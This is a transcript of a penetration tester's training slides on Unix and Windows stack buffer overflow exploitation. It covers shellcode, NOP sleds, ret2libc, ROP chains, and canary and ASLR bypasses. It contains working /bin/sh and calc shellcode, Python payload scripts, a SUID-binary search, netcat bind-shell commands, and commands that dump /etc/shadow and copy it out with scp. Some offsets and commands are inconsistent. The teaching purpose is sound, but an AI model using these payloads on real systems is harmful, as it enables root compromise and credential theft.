unix executable buffer overflow
TRANSCRIPT
UNIX EXECUTABLE EXPLOITATION
Ammarit Thongthua
<ShellCodeNoobx Es>
#whoami
<Name>
Ammarit Thongthua
Mr. K
ShellCodeNoob
</Name>
<Profile>
Pentest Team leader in private company
</Profile>
FB : Ammarit Es Shellcodenoob
“There are some relationships between
- Reverse Engineering
- Buffer overflow
- Shellcode They are the complement of each other”
“Sleepy Kama”
#Inspiration
AGENDA
Introduction Vulnerable Unix executable
Memory Space and Stack Layout
Buffer Overflow
Unix application Basic Reverse Engineer
ShellCode
Protection vs Expliotation Basic Stack without protection
Bypass password protection Exploit to get root privilege
Limited Stack Space
StackGuard (Canary)
Non-Executable-Stack (NX)
ROP Chain
Address Space Layout Randomization (ASLR) Defeat with static system library (kernel < 2.6.20 )
ASLR with removed Static system library Defeat with application wrapping (kernel >= 2.6.20 )
Compare with windows exploitation
Chapter I
“Vulnerable Unix Application”
VULNERABLE UNIX APPLICATION
Has permission “root” as user or group
SUID or SGID is set (Sting S at eXecute bit)
This 2 criteria provided privilege escalation to be root
list="$(find / -perm -4000 -o -perm -2000)";for i in
$list; do ls -al $i; done
ls –R / | grep “wsr” | grep “root”
VULNERABLE UNIX APPLICATION
VULNERABLE UNIX APPLICATION
Use vulnerable input standard function
Ex: strcp(), gets(), sprintf (), vsprintf ()
They make the program can possibly segmentation
fault or buffer overflow
Chapter II
“Memory Address and Stack Layout”
MEMORY ADDRESS AND STACK LAYOUT
0xFFFFFFFF
0x00000000
Code Segment
Data Segment
DSS Segment
Heap
Stack
MEMORY ADDRESS AND STACK LAYOUT
0xFFFFFFFF
0x00000000
Code Segment
Data Segment
DSS Segment
Heap
Stack
MEMORY ADDRESS AND STACK LAYOUT
0xFFFFFFFF
0x00000000
Code Segment
Data Segment
DSS Segment
Heap
Stack
MEMORY ADDRESS AND STACK LAYOUT
main ()
{
int i = 0;
checkpw (); }
char pw[608];
MEMORY ADDRESS AND STACK LAYOUT
0xFFFFFFFF
0x00000000
Stack
Int i = 0;
…..
Previous Stacks
Main()
ESP
MEMORY ADDRESS AND STACK LAYOUT
main ()
{
int I = 0;
checkpw (); }
char pw[608];
MEMORY ADDRESS AND STACK LAYOUT
main ()
{
int I = 0;
checkpw (); }
char pw[608];
RP
MEMORY ADDRESS AND STACK LAYOUT
0xFFFFFFFF
0x00000000
Char pw[608];
Int i = 0;
…..
Previous Stacks
Main()
checkpw() SFP
RP
Stack
ESP
Chapter III
“Stack buffer overflow”
BUFFER OVERFLOW
The situation when the data that input to the
system is larger than the size of buffer that
declare to be used
AAAAAAAAAA....[607 of A]….AAA\x00 SFP RP
AAAAAAAAAA….[616 of A]….AAAAAAAAAAAAAA\x00
SFP = 0x41414141
***RP = 0x41414141
“Segmentation fault” “Illegal Instruction”
SFP RP
Ex: char pw[608];
“How can we detect
buffer overflow in unix application?”
“Generally, we use manually test”
BUFFER OVERFLOW
“Better way, we use pattern test”
BUFFER OVERFLOW
/usr/share/metasploit-framework/tools/pattern_create.rb 1000
Check buffer overflow position
BUFFER OVERFLOW
Check buffer overflow position
/usr/share/metasploit-framework/tools/pattern_offset.rb 41347541
BUFFER OVERFLOW
“What happen
if we can over write Return Pointer?”
“Can we control flow of instruction?”
“Yes”
BUFFER OVERFLOW
AAAAAAAAAAAAA….[612 of A]….AAAAAAA
SFP = 0x41414141
***RP = 0x080484c7
“Segmentation fault” “Illegal Instruction”
SFP RP
0x080484c7
BUFFER OVERFLOW
BUFFER OVERFLOW
Demo #1
GDB and Bypass password
protection
Chapter IV
“Basic Shellcode”
“Imagine if we can control Return Pointer to
our own Instruction”
“So, we can control the whole system”
SHELL CODE
[Malicious Machine OpCode] + AAAAAAAAAAAAAAA
SFP = 0x41414141
***RP = 0xFBFF0544
0xF
BF
F0544
0xFBFF0544
SFP RP
Attacker can control return pointer to run Malicious Machine OpCode that put to memory (Shell Code).
Insert shell code as a part of input to reduce the complexity of exploitation
SHELL CODE
Shell code is the code that attacker want the
system run in order to operate the command as
attacker need (create form assembly and convert
to OpCode
Ex;
Open port for connection to that system with root privilege
Add user to the system
Run shell as root privilege
Shell code is written as Hexadecimal format
“What happen if we can make Return Pointer
system_call /bin/sh
by program run as root ?”
“We will get shell prompt with root pri.”
SHELL CODE
31 C0 50 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 50 53 89 E1 B0 0B CD 80
Assembly Code Op Code
Shell Code
: system_call (/bin/sh)
/bin
0000
//sh
0000
$esp
SHELL CODE
System_call(/bin/sh) Run as “root”
Vulnerability program
We get /bin/sh as root
RP
“How can we get shellcode ?”
Where can we get shell code use to make exploit. ?
Create your own shell code (quite take time)
Use Metasploit to generate shell code
Metepreter
Search from internet
shell-storm.org/shellcode
packetstormsecurity.com
www.exploit-db.com/exploits
SHELL CODE
“How can we manually create shellcode ?”
“Good news, you need to understand
Assemble first !!”
https://defuse.ca/online-x86-assembler.htm#disassembly
SHELL CODE
SHELL CODE
“How can we know what is shellcode do ?”
“Good news again, you need to understand
Assemble first !!”
http://www2.onlinedisassembler.com/odaweb/
SHELL CODE
“Can you see something difference between
Assembly from debugger and output from
the webs?”
ASSEMBLY CODE
From our debugger From our web disassembly
What’s wrong ?
Nothing wrong..
It’s just different instruction set
ASSEMBLY CODE
From our debugger From our web disassembly
AT&T base instruction Intel base instruction
Chapter V
“Make exploit payload”
EXPLOIT PAYLOAD
[Shell Code] + [PADDING make size to 612 ]
SFP = 0x41414141
***RP = 0xBFFF528
0xB
FF
F528
SFP RP
Payload = Shellcode + PAD + RP
612 bytes 4 bytes
0xBFFF528
Example:
Where is the shell code start location (For this
example case)?
Need to reverse engineering and debug
EXPLOIT PAYLOAD
Shellcode = “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80” RP = “\x20\xf5\xff\xbf” #0xBFFF520 (Little Endean!!!) PAYLOAD = scode + “A”*528 + RP print PAYLOAD ----------------------------------------------------------------------------------------------- user@host:$ python exp.py | ./vul_app
EXPLOIT PAYLOAD
“Let’s try our payload”
EXPLOIT PAYLOAD
Sometime result of our exploit is crash !!!
“What’s wrong in our PAYLOAD ^^? ”
EXPLOIT PAYLOAD
Memory on address when debug and run exploit
payload may a bit shift
[Shell Code] + [PADDING make size to 612 ] 0xBFFF528
“How can we solve this problem ?”
[ Shell Code ] + [ 577 Byte of PADDING ] 0xBFFF528
EXPLOIT PAYLOAD
[400B. Landing space] +[Shell Code] + [177 B. PADDING ] 0xBFFF540
NOP (\x90) = Do nothing
Shellcode = “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80” RP = “\x58\xf5\xff\xbf” # 0xBFFF558 Exp = “\x90”*400 + scode + “A”*128 + RP ----------------------------------------------------------------------------------------------- user@host:$ python exp.py | ./vul_app
EXPLOIT PAYLOAD
“Let’s try our improved payload”
EXPLOIT CODE
When exploit successfully
EXPLOIT CODE
Demo #2
Exploit to get root privilege
Chapter VI
“Buffer overflow in limited stack space”
LIMITED STACK SPACE
\x31\x57\xdf\x45\x98\xce\x55\xed\x78\xed\xed\x57\x76\x23\x12\x6f\xf3\x6e\x4a\
SFP = 0x12237657
***RP = 0x4a6ef36f
SFP RP
Payload =\x31\x57\xdf\x45\x98\xce\x55\xed\x78\xed\xed\x57\x76\x23\x12\x6f\xf3\x6e\x4a\
“Segmentation fault” “Illegal Instruction”
“How can we solve this problem”
LIMITED STACK SPACE
[ NOP Space (NOP Sledding) ] + [S h e l l C o d e ]
AAAAAAAAAAAAA…[612 of A]…AAAAAAAA
SFP = 0x41414141
***RP = 0xBFFFxxxx ??? (We don’t know yet)
0xF
BF
Fxxxx
0xFBFFxxxx
SFP RP
If size of buffer is limited, we need to put some
shell code some where in stack and control RP to
run shell code
LIMITED STACK SPACE
***RP = 0xBFFFF7B0
Shellcode = “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80” RP = “\xb0\xf7\xff\xbf” # 0xBFFF520 Exp =`python c- ‘print “A”*612` + RP + =`python c- ‘print “\x90”*400` + scode
----------------------------------------------------------------------------------------------- user@host:$ python exp.py | ./vul_app
LIMITED STACK SPACE
When exploit successfully
LIMITED STACK SPACE
Demo #3
Exploit to get root privilege
With Limited Stack Space
LIMITED STACK SPACE
SUMMARY
Grant() main() AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA RP
\x90\x90\x90 \x90\x90 + [Shell Code] + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA RP
\x90 \x90\x90\x90\x90\x90\x90 + [Shell Code] AAAAAAAAAAAAAAAAAAAAAAAAAAA RP AAAAA
Bypass password protection
Buffer overflow to run shellcode to get root privilege
Buffer overflow to run shellcode with limited Stack Space
“Is it easy like this in real life?”
“No..”
Chapter VII
“Ret-2-libc”
“What is Ret-2-libc ?”
Characteristic of vulnerable program
Has set SUID, GUID
Can Overflow
Use Libc.
BYPASS LIMITED STACK SPACE BY RET-2-LIBC
“What happen if we jump RP and run?”
system_call nc –l –p 9999 –e /bin/sh
Fool program to make system call with evil
command
System_call nc -l -p 9999 -e /bin/sh
AAAAAAAAAAAAA
If Arg = “nc -l -p 9999 -e /bin/sh” and Program run as “root” So, “nc –l –p 9999 –e /bin/sh” run as “root”
SFP
RP Arg system
BYPASS LIMITED STACK SPACE BY RET-2-LIBC
Find location of “system” call function
BYPASS LIMITED STACK SPACE BY RET-2-LIBC
Create “evil” Argument as system global variable
AAAAAAAAAAAAA
SFP RP =
Arg system
\xf0\x4e\xec\xb7 \x98\xfa\xff\xbf NC =
BYPASS LIMITED STACK SPACE BY RET-2-LIBC
Result
BYPASS LIMITED STACK SPACE BY RET-2-LIBC
When exploit successfully
BYPASS LIMITED STACK SPACE BY RET-2-LIBC
Demo #4
Exploit to get root privilege
with Ret-2-libc style
BYPASS LIMITED STACK SPACE BY RET-2-LIBC
Chapter VIII
“ROP Chaining”
The limitation of Ret-2-Libc is run only 1 command a time to exploit
AAAAAAAAAAAAA
SFP RP =
Arg system
\xf0\x4e\xec\xb7 \x98\xfa\xff\xbf NC =
ROP CHAIN
“It’s better if we can run more than one
command in one exploit”
“Let improve Ret-2-Libc to ROP Chaining”
AAAAAAAAAAAAA
SFP RP =
Arg1 system
\xf0\x4e\xec\xb7 \x98\xfa\xff\xbf NC =
ROP CHAIN
RP
AAAAAAAAAAAAA Arg1 system
ROP CHAIN
RP
Arg1 system
ROP CHAIN
RP
Arg1 system
ROP CHAIN
RP
Arg1 system
ROP CHAIN
RP Arg2 system
ROP CHAIN
Arg1 system system Arg2 RP
ROP CHAIN
Arg1 system system Arg2 RP
ROP CHAIN
Arg1 system system Arg2 RP system Arg3 RP
ROP CHAIN
Arg1 system system Arg2 RP system Arg3 RP
ROP CHAIN
Arg1 system system Arg2 system Arg3
Argn-2 system system Argn-1 system Argn
export ARG1=“unshadow /etc/passwd /etc/shadow > /output.txt”
export ARG2=“scp [email protected]:output.txt /home/haker”
.
.
.
.
export ARGn=“nc –l –p 4444 –e /bin/sh”
ROP CHAIN
“How can we chain them ?”
“We need POP POP RET”
ROP Gadget
Arg1 system
ROP CHAIN
RP Arg2 system
POP
POP
RET
ROP CHAIN
POP POP RET
Arg1 system RP Arg2 system
ROP CHAIN
ROP CHAIN
POP
POP
RET
\xc5\x85\x48\x80
Arg1 system RP Arg2 system
ROP CHAIN
Arg1 system system Arg2 system Arg3
Argn-2 system system Argn-1 system Argn
RP = \xc5\x85\x48\x80 (POP|POP|RET)
RP RP RP
RP RP
ROP CHAIN
python -c 'print "A"*12 +
"\x[syscall.addr.]" + "\x[P/P/R addr.]" + "\x[addr.arg1]" + "PADS" +
"\x[syscall.addr.]" + "\x[P/P/R addr.]" + "\x[addr.arg2]“ + "PADS" +
"\x[syscall.addr.]" + "\x[P/P/R addr.]" + "\x[addr.arg3]“ + "PADS" +
"\x[syscall.addr.]" + "\x[P/P/R addr.]" + "\x[addr.arg4]“ + "PADS" +
.
.
. "\x[syscall.addr.]" + "\x[P/P/R addr.]" + "\x[addr.argN]“ + "PADS" +
Chapter IIX
“Stack Guard (Canary)”
Cookie of death
STACK GUARD (CANARY)
Protection mechanism place in stack (8 byte) to detect the overflow and preventing to control RP
Need to include when we compile program
gcc -fstack-protector code.c -o myprogram
If canary overwritten the program will be terminated
Type of Canary
NULL canary (0x00000000)
Terminator canary (0x00000aff – 0x000aff0d)
Random canary (Unpredicted 4 byte)
AAAAAAAAAAAAAAAAAAAA AAAA AAAA AAAA
SFP RP Canary
For Null canary and Terminator canary can be
defeated by “Canary repaired”
NULL canary only app use gets() function
AAA…AAA00000000AAAA[RP] x90\x90\x90\x[Shellcode]\x0a
Terminator canary (always 0x00000aff)
app use gets() function
app use strcpy() function and need more than 1 arg
AAA…AAAAAAA0affAAAA[RP] x90\x90\x90\x[Shellcode]00
BBB…BBBBB00
CCC…CCC00
AAA…AAA00000affAAAA[RP] x90\x90\x90\x[Shellcode]
STACK GUARD (CANARY) DEFEAT
Arg1=
Arg2=
Arg3=
STACK GUARD (CANARY) DEFEAT EXAMPLE
Find opportunity to exploit
STACK GUARD (CANARY) DEFEAT EXAMPLE
Find opportunity to exploit
Canary value = 0x00000aff (It is a terminator canary ^_^)
STACK GUARD (CANARY) DEFEAT EXAMPLE
Run exploit
Demo #5
Exploit to get root privilege
with canary repaired
STACK GUARD (CANARY) DEFEAT
Chapter IX
“ASLR”
ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR)
Technique use prevent an attacker jumping to a
particular exploited code in memory by random
the virtual address in every runtime.
ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR)
\x90\x90\x90 \x90\x90 + [Shell Code] + AAAAAAAAAAAAAAAAAAAAA RP …….
Random is 2 So, Possibility =1/2 or 0.000001 20 20
How can we increase possibility to jump to shell code ?
ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR) DEFEAT METHOD
AAAAAAAAAAAAAAAAAAAAAAA RP /x90/x90/x90/x[ shell code ] …….
JMP ESP
esp
If OS kernel has some static lib kernel < 2.6.20.
Use JMP ESP (Trampoline) instruction in that
static lib to bring RP to shell code
INC EAX ADD EBS, EBP ….
ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR) DEFEAT METHOD
If OS kernel has not static lib (kernel >= 2.6.20 ), need to write application to call vulnerable application to limit random address space (App wrap up)
AAAAAAAAAAAAAAAAAAAAAAAAA
RP /x90/x90/x90/x90/x90/x90/x90/x90
/x90/x90/x90/x90/x90/x90/x90/x90/x90 /x90/x90/x90/x90/x[ shell code ]
Check current ESP value
and Set RP = ESP + [vul app buffer]
Wrap up app
ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR) DEFEAT METHOD
ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR) DEFEAT METHOD
Result
Chapter X
“Compare Windows & unix exploit”
DIFFERENCE OF UNIX AND WINDOWS APPLICATION EXPLOIT
Unix application directly communicate to kernel
Window application must communicate through
Window API (Not directly communicate to kernel) . It’s make more difficult to exploit
App Kernel
App Kernel API
WINDOW SHELLCODE
Static Shellcode (Example for window XP)
Static or fix memory address of windows API that use
in exploit code (Specific OS version and SP)
Find address of WinExec() > use to execute cmd / app
Find address of ExitProcess() > use to clear register
Portable Shellcode
Dynamically find memory address of need window
API by using 2 useful windows API
LoadLibraryA() to get Hmodule (DLL's base address )
GetProcessAddress() to get real address of function
Get address of WinExec()
Get address of ExitProcess()
Normally, virus use LoadLibraryA() and GetProcessAddress() to make portable expliot
WINDOW SHELLCODE
WINDOW SHELLCODE
Static Shellcode (Example for window XP)
WINDOW SHELLCODE
Static Shellcode (Example for window XP)
\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x4d\x11\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xa2\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff\x63\x61\x6c\x63\x2e\x65\x78\x65
BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION
Found the vulnerability of application
BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION
Input to the system is larger than the size of
buffer that declare to be used
AAAABBBBCCCC.....KKKKLLLLMMMM SFP RP
char local[49];
BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION
AAAABBBBCCCC.....KKKKLLLLMMMM NNNN OOOOPPPP
ESP
Find address to jump to exploit code
BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION
\x90\x90\x90\x90…[shellcode]…AAAAAAAA RP
* RP = “\x40\xff\x13
Exploit Successful
BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION
Successfully exploit.
But calc.exe run as
your permission not “Administrator”
Imagine, if some windows application provide
network service like FTP that start by
“SYSTEM” account and have buffer overflow vulnerability (Ex: WarFTP app)
BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION
BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION
BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION
BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION
FTP 192.168.1.2
USER AAAAAA….AAAA $JMP_ESP \x90\x90\x90\x90 SYSCODE
RP
ESP
After connect back to open port, user/password
to the system to confirm that we successfully get system privilege
BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION
Rule of permission gaining in Windows exploit
If we exploit the application, we will get the
permission as who start or run the application
If application or service start or run by
“Administrator” or “SYSTEM” account, we will gain
“Administrator” or “SYSTEM” privilege
All windows vulnerability that attacker use to
compromise OS occurred form successfully exploit
“SYSTEM” service
BASIC WINDOWS EXPLOITATION
DLL injection exploitation
SafeSeh (Structured Exception Handling) and Abuse
Windows ASLR and how to defeat
Windows DEP and how to defeat
GS protection in Windows application and how to defeat
Advance pivoting attack technique
HEAP overflow / Heap Spray / Use After free
“Unfortunately, We have not enough time to walk through”
MORE INTERESTING TOPIC FOR WINDOWS
CoreLAN team : https://www.corelan.be
NetSEC : http://netsec.ws/?p=180
http://www.cis.syr.edu/~wedu/education/buffer_overflow.html
LEARNING SITE
REFERENCE
SANS 660 Advanced Penetration Testing, Exploit Writing, and Ethical Hacking
GIAC GXPN : Exploit Researcher and Advanced Penetration Tester
Protecting Against Address Space Layou Randomization (ASLR) Compromises and Return-to-Libc Attacks Using Network Intrusion Detection Systems. David J. Day, Zheng-Xu Zhao, November 2011, Volume 8, Issue 4, pp 472-483
Cowan, C. Buffer Overflow Attacks. StackGuard:Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks. 1 October 2008.
Defeating PaX ASLR protection. Durden, T. 59, s.l. :Phrack, 2002, Vol. 12.